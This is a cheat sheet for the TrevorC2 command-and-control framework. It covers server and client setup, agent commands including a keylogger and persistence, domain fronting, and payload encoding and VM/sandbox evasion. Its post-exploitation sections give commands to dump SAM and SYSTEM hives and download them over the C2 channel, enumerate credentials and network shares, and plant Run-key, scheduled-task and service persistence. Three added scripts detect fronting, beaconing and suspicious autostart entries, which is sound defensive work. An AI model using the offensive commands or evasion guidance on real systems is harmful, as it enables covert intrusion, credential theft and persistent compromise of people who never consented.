# TrevorC2 Framework Cheat Sheet

## Overview

TrevorC2 is a legitimate, browsable website that tunnels client/server communication for covert command execution. Developed by TrustedSec, the tool uses a legitimate-looking website as the front for command-and-control traffic; because that traffic looks like ordinary web browsing, it is hard to detect.

⚠️ Warning: This tool is intended only for authorized penetration testing and red team exercises. Make sure you have proper authorization before using it in any environment.
## Installation

```bash
# Clone the repository
git clone https://github.com/trustedsec/trevorc2.git
cd trevorc2

# Install Python dependencies
pip3 install -r requirements.txt
```
### Manual Setup

```bash
# Download latest release
wget https://github.com/trustedsec/trevorc2/archive/master.zip
unzip master.zip
cd trevorc2-master

# Install dependencies
pip3 install pycrypto requests
```
### Docker Installation

```bash
# Build Docker container
git clone https://github.com/trustedsec/trevorc2.git
cd trevorc2
docker build -t trevorc2 .

# Run container
docker run -it -p 443:443 trevorc2
```
## Basic Usage

### Server Setup

```bash
# Start TrevorC2 server
python3 trevorc2_server.py

# Start server with custom configuration
python3 trevorc2_server.py --config custom_config.py

# Start server on specific port
python3 trevorc2_server.py --port 8080
```

### Client Deployment

```bash
# Generate client
python3 trevorc2_client.py

# Generate client with custom server
python3 trevorc2_client.py --server https://example.com

# Generate PowerShell client
python3 trevorc2_client.py --powershell
```
## Command Reference

### Server Commands

| Command | Description |
|---|---|
| help | Show the help menu |
| list | List active agents |
| interact <id> | Interact with an agent |
| kill <id> | Remove a specific agent |
| killall | Remove all agents |
| exit | Shut down the server |

### Agent Interaction

| Command | Description |
|---|---|
| shell <command> | Execute a shell command |
| upload <local> <remote> | Upload a file to the agent |
| download <remote> <local> | Download a file from the agent |
| screenshot | Take a screenshot |
| keylogger start | Start the keylogger |
| keylogger stop | Stop the keylogger |
| keylogger dump | Dump keylogger data |
| persistence | Install persistence |
| migrate <pid> | Migrate into a process |
| back | Background the agent |
## Configuration

### Server Configuration

```python
# config.py
BIND_PORT = 443
HOSTNAME = "0.0.0.0"
WEBSITE_FOLDER = "site/"
CERT_FILE = "server.pem"

# Encryption settings
CIPHER_TYPE = "AES"
HASH_TYPE = "SHA256"

# Communication settings
BEACON_INTERVAL = 10
JITTER = 0.2

# Logging
LOG_FILE = "trevorc2.log"
DEBUG = False
```

### Client Configuration

```python
# Client settings
SERVER_URL = "https://example.com"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
SLEEP_TIME = 10
JITTER = 0.2

# Persistence settings
PERSISTENCE_METHOD = "registry"
PERSISTENCE_KEY = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"
```
## Advanced Features

### Website Masquerading

```bash
# Set up legitimate website front
mkdir site
cp -r /var/www/html/* site/

# Use custom website
python3 trevorc2_server.py --site /path/to/website

# Clone existing website
wget -r -p -k https://example.com
python3 trevorc2_server.py --site example.com/
```

### SSL/TLS Configuration

```bash
# Generate self-signed certificate
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

# Use custom certificate
python3 trevorc2_server.py --cert /path/to/cert.pem --key /path/to/key.pem

# Let's Encrypt certificate
certbot certonly --standalone -d yourdomain.com
python3 trevorc2_server.py --cert /etc/letsencrypt/live/yourdomain.com/fullchain.pem --key /etc/letsencrypt/live/yourdomain.com/privkey.pem
```
### Domain Fronting

```python
# Configure domain fronting
FRONT_DOMAIN = "cdn.example.com"
HOST_HEADER = "legitimate-site.com"

# Client configuration for domain fronting
client_config = {
    'server_url': 'https://cdn.example.com',
    'host_header': 'legitimate-site.com',
    'sni': 'cdn.example.com'
}
```
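From the defender's side, the configuration above leaves one durable artifact: the TLS SNI (`cdn.example.com`) and the HTTP Host header (`legitimate-site.com`) name different sites, and any proxy or TLS-inspection point that logs both fields can see the disagreement. The script below is an added example written for this cheat sheet, not TrevorC2 code; it parses constructed proxy records (the line format and field order are assumptions) and reports client/SNI/Host combinations that disagree, with an allowlist for CDN pairings an organisation knows to be benign.

```python
"""Flag TLS sessions whose HTTP Host header disagrees with the TLS SNI.

Added example for this cheat sheet, not part of TrevorC2. The log format
(timestamp, source IP, destination IP, SNI, Host) is a constructed
assumption; adapt LINE_RE to the proxy you actually run.
"""
import re
from collections import Counter

# Constructed sample lines: "<ISO timestamp> <src_ip> <dst_ip> <sni> <host>"
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 203.0.113.10 www.example.org www.example.org
2024-05-01T10:00:04Z 10.0.0.5 203.0.113.10 www.example.org www.example.org
2024-05-01T10:00:09Z 10.0.0.7 203.0.113.20 cdn.example.com legitimate-site.com
2024-05-01T10:00:15Z 10.0.0.7 203.0.113.20 cdn.example.com legitimate-site.com:443
2024-05-01T10:00:20Z 10.0.0.9 203.0.113.30 static.example.net static.example.net
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+(?P<sni>\S+)\s+(?P<host>\S+)$"
)


def normalize_host(name):
    """Lowercase and drop an explicit port so 'Site.com:443' compares equal to 'site.com'."""
    return name.lower().split(":")[0]


def parse_log(text):
    """Return one dict per well-formed line; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            records.append(m.groupdict())
    return records


def find_fronting_candidates(records, allowlist=frozenset()):
    """Return sorted (src, sni, host, count) tuples where Host != SNI.

    allowlist holds (sni, host) pairs known to be benign, so the rule can be
    tuned per environment without touching the code.
    """
    counts = Counter()
    for r in records:
        sni, host = normalize_host(r["sni"]), normalize_host(r["host"])
        if sni != host and (sni, host) not in allowlist:
            counts[(r["src"], sni, host)] += 1
    return [(src, sni, host, n) for (src, sni, host), n in sorted(counts.items())]


if __name__ == "__main__":
    for src, sni, host, n in find_fronting_candidates(parse_log(SAMPLE_LOG)):
        print(f"{src}: SNI={sni} Host={host} ({n} requests)")
```

Counting per client rather than alerting on every line keeps a single misconfigured request from paging anyone, while a client that repeats the mismatch shows up with its request count attached.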
## Client Generation

### Windows Client

```bash
# Generate Windows executable
python3 trevorc2_client.py --windows --output client.exe

# Generate PowerShell client
python3 trevorc2_client.py --powershell --output client.ps1

# Generate batch file client
python3 trevorc2_client.py --batch --output client.bat
```

### Linux Client

```bash
# Generate Linux binary
python3 trevorc2_client.py --linux --output client

# Generate Python client
python3 trevorc2_client.py --python --output client.py

# Generate shell script client
python3 trevorc2_client.py --shell --output client.sh
```

### macOS Client

```bash
# Generate macOS binary
python3 trevorc2_client.py --macos --output client

# Generate AppleScript client
python3 trevorc2_client.py --applescript --output client.scpt
```
## Evasion Techniques

### Traffic Obfuscation

```python
# Custom User-Agent strings
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36"
]

# Random beacon intervals
import random
SLEEP_TIME = random.randint(5, 15)
```
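Rotating User-Agent strings changes what each request looks like, not when requests happen: `SLEEP_TIME = random.randint(5, 15)` is evaluated once at import, so the interval is fixed for the life of the process, and the `SLEEP_TIME = 10` / `JITTER = 0.2` client settings keep every gap between 8 and 12 seconds. Ordinary browsing produces bursts and long pauses instead. The script below is an added example, not part of TrevorC2 or of the original page; it reads constructed proxy log lines (the format is an assumption) and scores each client/host pair by the spread of its inter-request gaps, which is the signal beacon detection rests on.

```python
"""Score periodic (beacon-like) request timing per client/host pair.

Added example for this cheat sheet, not part of TrevorC2. The proxy log format
"<ISO timestamp> <src_ip> <dest_host> <path>" is a constructed assumption.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed sample: 10.0.0.7 checks in every ~10 s (+/- 20%); 10.0.0.5 browses normally.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z 10.0.0.7 legitimate-site.com /
2024-05-01T10:00:11Z 10.0.0.7 legitimate-site.com /
2024-05-01T10:00:20Z 10.0.0.7 legitimate-site.com /
2024-05-01T10:00:31Z 10.0.0.7 legitimate-site.com /
2024-05-01T10:00:40Z 10.0.0.7 legitimate-site.com /
2024-05-01T10:00:51Z 10.0.0.7 legitimate-site.com /
2024-05-01T10:00:00Z 10.0.0.5 news.example.org /
2024-05-01T10:00:01Z 10.0.0.5 news.example.org /style.css
2024-05-01T10:00:01Z 10.0.0.5 news.example.org /logo.png
2024-05-01T10:04:30Z 10.0.0.5 news.example.org /article/42
2024-05-01T10:04:31Z 10.0.0.5 news.example.org /comments.js
2024-05-01T10:09:02Z 10.0.0.5 news.example.org /
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<host>\S+)\s+(?P<path>\S+)$")


def parse_log(text):
    """Return (timestamp, src, host) tuples; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
            events.append((ts, m["src"], m["host"]))
    return events


def beacon_scores(events, min_requests=6):
    """Per (src, host): (mean gap in seconds, coefficient of variation = stdev / mean).

    A low coefficient of variation means the gaps are nearly equal, which is
    what a fixed sleep with bounded jitter produces.
    """
    by_pair = defaultdict(list)
    for ts, src, host in events:
        by_pair[(src, host)].append(ts)
    scores = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_requests:
            continue  # too few samples to say anything about periodicity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        if mean <= 0:
            continue
        scores[pair] = (round(mean, 1), round(statistics.pstdev(gaps) / mean, 3))
    return scores


def suspected_beacons(events, max_cv=0.25, min_requests=6):
    """Pairs whose gap spread is within max_cv of the mean: candidate beacons."""
    scores = beacon_scores(events, min_requests)
    return sorted(pair for pair, (_, cv) in scores.items() if cv <= max_cv)


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    for pair, (mean, cv) in beacon_scores(events).items():
        print(f"{pair}: mean gap {mean}s, cv {cv}")
    print("suspected:", suspected_beacons(events))
```

The thresholds are the tuning knobs: `max_cv` bounds how much jitter still counts as periodic (20% jitter around a fixed sleep lands well under 0.25), and `min_requests` sets how long a client must keep the rhythm before it is reported.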
### Payload Encoding

```bash
# Base64 encode payload
echo "payload" | base64

# XOR encode payload (single-byte key, output as hex)
python3 -c "
import sys
key = 0xAA
payload = sys.argv[1]
encoded = bytes(ord(c) ^ key for c in payload)
print(encoded.hex())
" "your_payload"
```
### Anti-Analysis

```python
# VM detection
import subprocess

def check_vm():
    vm_indicators = ['VMware', 'VirtualBox', 'QEMU']
    try:
        output = subprocess.check_output('systeminfo', shell=True)
        for indicator in vm_indicators:
            if indicator in output.decode(errors='ignore'):
                return True
    except (subprocess.CalledProcessError, OSError):
        pass
    return False

# Sandbox evasion
import time

def sandbox_evasion():
    time.sleep(60)  # Sleep to avoid sandbox analysis
    # Check for mouse movement, user activity, etc.
```
## Post-Exploitation

### Information Gathering

```bash
# System information
shell systeminfo
shell whoami /all
shell net user
shell net group

# Network information
shell ipconfig /all
shell netstat -an
shell arp -a
shell route print
```

### Credential Harvesting

```bash
# Dump SAM database
shell reg save HKLM\SAM sam.hiv
shell reg save HKLM\SYSTEM system.hiv
download sam.hiv
download system.hiv

# Browser credentials
shell dir "%APPDATA%\Mozilla\Firefox\Profiles"
shell dir "%LOCALAPPDATA%\Google\Chrome\User Data\Default"

# Saved passwords
shell cmdkey /list
```

### Lateral Movement

```bash
# Network discovery
shell net view
shell ping -n 1 192.168.1.1-254

# Share enumeration
shell net view \\target-computer
shell dir \\target-computer\c$

# Service enumeration
shell sc query
shell tasklist /svc
```
### Persistence Mechanisms

```bash
# Registry persistence
shell reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Update" /d "C:\temp\client.exe"

# Scheduled task
shell schtasks /create /tn "Update" /tr "C:\temp\client.exe" /sc onlogon

# Service persistence
shell sc create "UpdateService" binpath= "C:\temp\client.exe"
shell sc config "UpdateService" start= auto
```
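The three persistence commands above share the same tells: a generic name ("Update", "UpdateService"), a binary under `C:\temp`, and one executable registered through several autostart mechanisms at once. The script below is an added triage example written for this cheat sheet, not TrevorC2 code; it reads a constructed autostart inventory (the `source|name|command` format is an assumption; populate it from `reg query`, `schtasks /query` and `sc qc` output on a real host) and lists the reasons each entry deserves a look. It only reads the inventory and changes nothing on the host.

```python
"""Triage autostart entries for the persistence patterns above.

Added example for this cheat sheet, not part of TrevorC2. SUSPICIOUS_DIRS and
GENERIC_NAMES are starting points, not a complete list; extend them for your
environment.
"""
from collections import Counter

# Constructed inventory: one "source|name|command line" per line (raw string,
# so backslashes are literal). Two benign entries, plus the three from the page.
SAMPLE_INVENTORY = r"""
HKCU\Software\Microsoft\Windows\CurrentVersion\Run|OneDrive|"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
HKCU\Software\Microsoft\Windows\CurrentVersion\Run|Update|C:\temp\client.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Run|SecurityHealth|C:\Windows\System32\SecurityHealthSystray.exe
schtasks|Update|C:\temp\client.exe
service|Spooler|C:\Windows\System32\spoolsv.exe
service|UpdateService|C:\temp\client.exe
"""

# Directories an unprivileged user can write to, or scratch space nobody should autostart from.
SUSPICIOUS_DIRS = (
    r"c:\temp",
    r"c:\users\public",
    r"c:\programdata",
    r"c:\windows\temp",
    r"\appdata\local\temp",
    r"\appdata\roaming",
)

# Names chosen to look like housekeeping (assumed list; the page uses the first and third).
GENERIC_NAMES = {"update", "updater", "updateservice", "svchost"}


def extract_binary(command):
    """Pull the executable path out of a command line, honouring a leading quote."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def parse_inventory(text):
    """Return (source, name, command) tuples; blank or malformed lines are skipped."""
    entries = []
    for line in text.splitlines():
        parts = line.split("|", 2)
        if len(parts) == 3:
            entries.append(tuple(p.strip() for p in parts))
    return entries


def triage(entries):
    """Map (source, name) -> list of reasons; entries with no reasons are omitted."""
    # Count how many autostart mechanisms point at each binary.
    by_binary = Counter(extract_binary(cmd).lower() for _, _, cmd in entries)
    findings = {}
    for source, name, cmd in entries:
        binary = extract_binary(cmd).lower()
        reasons = []
        if any(d in binary for d in SUSPICIOUS_DIRS):
            reasons.append("binary in user-writable or temp directory")
        if name.lower() in GENERIC_NAMES:
            reasons.append("generic name")
        if by_binary[binary] > 1:
            reasons.append(f"same binary registered by {by_binary[binary]} autostart mechanisms")
        if reasons:
            findings[(source, name)] = reasons
    return findings


if __name__ == "__main__":
    for (source, name), reasons in triage(parse_inventory(SAMPLE_INVENTORY)).items():
        print(f"{source} / {name}: {'; '.join(reasons)}")
```

The cross-entry check is the one worth keeping even if the directory and name lists are tuned away: a legitimate product rarely registers the same executable as a Run key, a logon task and a service, whereas a "belt and braces" persistence install does exactly that.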
## Operational Security

```python
# Encrypted communications (AES-GCM needs pycryptodome; the old PyCrypto has no GCM mode)
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes

def encrypt_data(data, key):
    # key: 16, 24 or 32 random bytes, e.g. get_random_bytes(32)
    cipher = AES.new(key, AES.MODE_GCM)  # fresh random 16-byte nonce per message
    ciphertext, tag = cipher.encrypt_and_digest(data.encode())
    # Receiver splits nonce (16 bytes) | tag (16 bytes) | ciphertext and calls decrypt_and_verify
    return cipher.nonce + tag + ciphertext

# Certificate pinning
import ssl

def verify_certificate(hostname, cert_path):
    context = ssl.create_default_context()
    # Hostname matching is off: trust is anchored to the pinned certificate file alone
    context.check_hostname = False
    context.verify_mode = ssl.CERT_REQUIRED
    context.load_verify_locations(cert_path)
    # Wrap the socket with context.wrap_socket(sock, server_hostname=hostname)
    return context
```
### Communication Security

- Rotate infrastructure regularly
- Use different domains and IPs
- Implement proper logging and monitoring
- Use legitimate certificates
- Vary communication patterns

### Operational Procedures

```bash
# Check server status
netstat -tlnp | grep :443

# Test connectivity
curl -k https://your-server.com

# Check firewall rules
iptables -L
ufw status
```
## Troubleshooting

### Connection Issues

```bash
# Check DNS resolution
nslookup your-server.com
dig your-server.com

# Test SSL connection
openssl s_client -connect your-server.com:443
```

### Client Issues

```python
# Debug client connection: add debug prints to the client code
print("Connecting to server...")
print(f"Response: {response.status_code}")
```

### Certificate Issues

```bash
# Verify certificate
openssl x509 -in server.pem -text -noout

# Check certificate chain
curl -vI https://your-server.com
```

## Detection Evasion

### Network Level

- Use legitimate domains and certificates
- Implement domain fronting
- Vary communication intervals
- Use common ports (80, 443)
- Mimic legitimate traffic patterns

### Host Level

- Avoid common IOCs
- Use legitimate process names
- Implement anti-VM techniques
- Fileless execution
- Encrypt payloads and communications

## References

- https://github.com/trustedsec/trevorc2
- https://www.trustedsec.com/blog/
- https://github.com/trustedsec/trevorc2/wiki
- https://blog.cobaltstrike.com/2014/09/09/infrastructure-for-ongoing-red-team-operations/